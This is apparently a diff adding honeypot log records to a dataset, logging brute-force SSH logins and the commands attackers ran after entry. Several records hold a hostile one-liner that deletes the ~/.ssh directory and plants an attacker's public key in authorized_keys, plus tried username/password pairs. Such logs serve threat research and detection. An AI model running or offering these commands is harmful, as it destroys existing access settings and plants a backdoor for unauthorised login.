{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "47244", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:19.579931"}
|
| 222 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "47244", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:19.580796"}
|
| 223 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "209.38.229.174", "src_port": 45066, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:20.391165"}
|
| 224 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "209.38.229.174", "src_port": 45066, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:20.391762"}
|
| 225 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "45066", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:20.538236"}
|
| 226 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:35916 (64.31.55.123:22) [session: 8a68ac4f5f74]", "src_host": "209.38.229.174", "src_port": "35916", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:06.441537"}
|
| 227 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "35916", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:06.590418"}
|
| 228 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'server'/b'vassilio'] failed", "src_host": "209.38.229.174", "src_port": "35916", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:07.276763"}
|
| 229 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "35916", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:08.427621"}
|
| 230 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "35916", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:08.428684"}
|
| 231 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:39068 (64.31.55.123:22) [session: 55e3a351a9f7]", "src_host": "43.156.90.187", "src_port": "39068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:45.737792"}
|
| 232 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "39068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:45.915904"}
|
| 233 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'ajizabanu'/b'ajizabanu'] failed", "src_host": "43.156.90.187", "src_port": "39068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:46.715980"}
|
| 234 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "39068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:47.894681"}
|
| 235 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "39068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:18:47.895650"}
|
| 236 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:54994 (64.31.55.123:22) [session: 0a0753a4c962]", "src_host": "209.38.229.174", "src_port": "54994", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:02.053416"}
|
| 237 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "54994", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:02.198151"}
|
| 238 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'perryno'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "54994", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:02.878636"}
|
| 239 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 54994, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:03.956758"}
|
| 240 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: lockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 54994, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:03.957126"}
|
| 241 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~", "src_host": "209.38.229.174", "src_port": 54994, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:05.059566"}
|
| 242 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: root@ubuntu:~#", "src_host": "209.38.229.174", "src_port": 54994, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:05.060167"}
|
| 243 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:56218 (64.31.55.123:22) [session: 23e81042e9d2]", "src_host": "209.38.229.174", "src_port": "56218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:05.349708"}
|
| 244 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "56218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:05.498479"}
|
| 245 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'345gs5662d34'/b'345gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "54994", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:06.184334"}
|
| 246 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "56218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:07.335655"}
|
| 247 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "56218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:07.336571"}
|
| 248 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:56938 (64.31.55.123:22) [session: 3174ae0982d9]", "src_host": "209.38.229.174", "src_port": "56938", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:07.480741"}
|
| 249 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "56938", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:07.625906"}
|
| 250 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'perryno'/b'3245gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "54994", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:08.294764"}
|
| 251 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "56938", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:09.444079"}
|
| 252 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "56938", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:09.445701"}
|
| 253 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "209.38.229.174", "src_port": 54994, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:10.329305"}
|
| 254 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "209.38.229.174", "src_port": 54994, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:10.329944"}
|
| 255 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "54994", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:19:10.475508"}
|
| 256 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:45848 (64.31.55.123:22) [session: 175ace077f69]", "src_host": "209.38.229.174", "src_port": "45848", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:01.773717"}
|
| 257 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "45848", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:01.922608"}
|
| 258 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'katherine'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "45848", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:02.551125"}
|
| 259 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 45848, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:03.581246"}
|
| 260 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: lockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 45848, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:03.581612"}
|
| 261 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~", "src_host": "209.38.229.174", "src_port": 45848, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:04.672205"}
|
| 262 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: root@ubuntu:~#", "src_host": "209.38.229.174", "src_port": 45848, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:04.672552"}
|
| 263 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:47010 (64.31.55.123:22) [session: 096b1ac783eb]", "src_host": "209.38.229.174", "src_port": "47010", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:04.970322"}
|
| 264 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "47010", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:05.118104"}
|
| 265 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'345gs5662d34'/b'345gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "45848", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:05.778153"}
|
| 266 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "47010", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:06.936301"}
|
| 267 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "47010", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:06.937165"}
|
| 268 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:47728 (64.31.55.123:22) [session: 501760da5b95]", "src_host": "209.38.229.174", "src_port": "47728", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:07.083224"}
|
| 269 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "47728", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:07.244865"}
|
| 270 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'katherine'/b'3245gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "45848", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:07.910641"}
|
| 271 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "47728", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:09.061133"}
|
| 272 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "47728", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:09.062152"}
|
| 273 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "209.38.229.174", "src_port": 45848, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:09.995978"}
|
| 274 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "209.38.229.174", "src_port": 45848, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:09.996629"}
|
| 275 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "45848", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:10.145455"}
|
| 276 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:48826 (64.31.55.123:22) [session: b17efff8a1ca]", "src_host": "43.156.90.187", "src_port": "48826", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:18.511311"}
|
| 277 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "48826", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:18.688820"}
|
| 278 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'sak'/b'sak'] failed", "src_host": "43.156.90.187", "src_port": "48826", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:19.485053"}
|
| 279 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "48826", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:20.664178"}
|
| 280 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "48826", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:20:20.665206"}
|
| 281 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:36700 (64.31.55.123:22) [session: a3f9562df53a]", "src_host": "209.38.229.174", "src_port": "36700", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:01.262687"}
|
| 282 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "36700", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:01.411019"}
|
| 283 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'ricoud'/b'ricoud'] failed", "src_host": "209.38.229.174", "src_port": "36700", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:02.102106"}
|
| 284 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "36700", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:03.251948"}
|
| 285 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "36700", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:03.253013"}
|
| 286 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:43520 (64.31.55.123:22) [session: adf4acdde2bd]", "src_host": "43.156.90.187", "src_port": "43520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:51.924748"}
|
| 287 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "43520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:52.102464"}
|
| 288 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'mysql'/b'local'] failed", "src_host": "43.156.90.187", "src_port": "43520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:52.906585"}
|
| 289 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "43520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:54.086411"}
|
| 290 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "43520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:54.087508"}
|
| 291 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:55782 (64.31.55.123:22) [session: 258469528bdb]", "src_host": "209.38.229.174", "src_port": "55782", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:57.901629"}
|
| 292 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "55782", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:58.045381"}
|
| 293 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'debby'/b'debby'] failed", "src_host": "209.38.229.174", "src_port": "55782", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:58.707651"}
|
| 294 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "55782", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:59.852635"}
|
| 295 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "55782", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:21:59.853424"}
|
| 296 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 85.209.11.227:55768 (64.31.55.123:22) [session: 2dcf79cf5c18]", "src_host": "85.209.11.227", "src_port": "55768", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:22:06.520398"}
|
| 297 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "85.209.11.227", "src_port": "55768", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:22:06.693327"}
|
| 298 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:50538 (64.31.55.123:22) [session: 3e080353042e]", "src_host": "43.156.90.187", "src_port": "50538", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:23:24.582843"}
|
| 299 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "50538", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:23:24.759688"}
|
| 300 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'tigger'/b'tigger123'] failed", "src_host": "43.156.90.187", "src_port": "50538", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:23:25.553765"}
|
request_response/curated.jsonl
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
request_response/vm_replay_2021_2022.jsonl
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:5ce98760effdd301fd2bbb8259892aa1db7d12355527351f91dcd70fa949abca
|
| 3 |
+
size 18315784
|
sessions/2021_2022.jsonl
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
sessions/2024.jsonl
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|